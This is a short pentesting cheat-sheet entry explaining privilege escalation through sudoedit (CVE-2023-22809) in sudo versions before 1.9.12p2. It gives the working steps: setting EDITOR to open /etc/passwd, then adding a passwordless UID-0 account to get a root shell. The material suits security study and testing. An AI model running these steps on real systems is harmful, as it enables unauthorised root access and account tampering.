Exploit Notes

Sudoedit Privilege Escalation

Last modified: 2023-03-11

Privilege Escalation

Sudoedit is vulnerable to privilege escalation.

Investigation

sudo -l

(root) sudoedit /opt/example.txt

If we can execute sudoedit command as root, we might be able to escalate the privileges with some version.


Exploitation (CVE-2023-22809)

In sudo version before 1.9.12p2, the sudoedit can modify arbitrary file with unrestricted privilege.

export EDITOR="vim -- /etc/passwd"
sudo sudoedit /opt/example.txt

In vim editor, add the following new line in /etc/passwd.

sudoedit::0:0:root:/root:/bin/bash

Now we can get a root shell.

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.